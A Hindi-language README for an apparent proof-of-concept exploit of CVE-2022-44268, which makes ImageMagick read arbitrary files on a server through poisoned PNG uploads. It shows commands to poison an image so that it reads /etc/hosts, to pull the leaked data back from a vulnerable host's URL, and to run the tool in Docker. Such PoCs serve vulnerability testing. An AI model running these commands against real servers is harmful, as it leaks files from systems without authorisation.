
CVE-2022-44268 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो कमजोर ImageMagick इंस्टेंस पर अपलोड की गई जहरीली PNG छवियों के माध्यम से मनमानी फ़ाइल पढ़ने को सक्षम बनाता है। Docker समर्थन और URL-आधारित निष्कर्षण शामिल है।
CVE-2022-44268 ImageMagick मनमानी फ़ाइल पढ़ना - प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट
इमेज को जहरीला बनाएं ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
जहरीली PNG इमेज अपलोड करें।
जांचें कि एक्सप्लॉइट सफल रहा 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
बिल्ड
docker build -t cve-2022-44268 .
चलाएँ
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| पैरामीटर | विवरण | प्रकार |
|---|---|---|
| --url | अपलोड की गई PNG इमेज का URL | String |
| --image | इनपुट PNG फ़ाइल | File |
| --output | आउटपुट PNG फ़ाइल | File |
| --file-to-read | असुरक्षित होस्ट से पढ़ने के लिए फ़ाइल | String |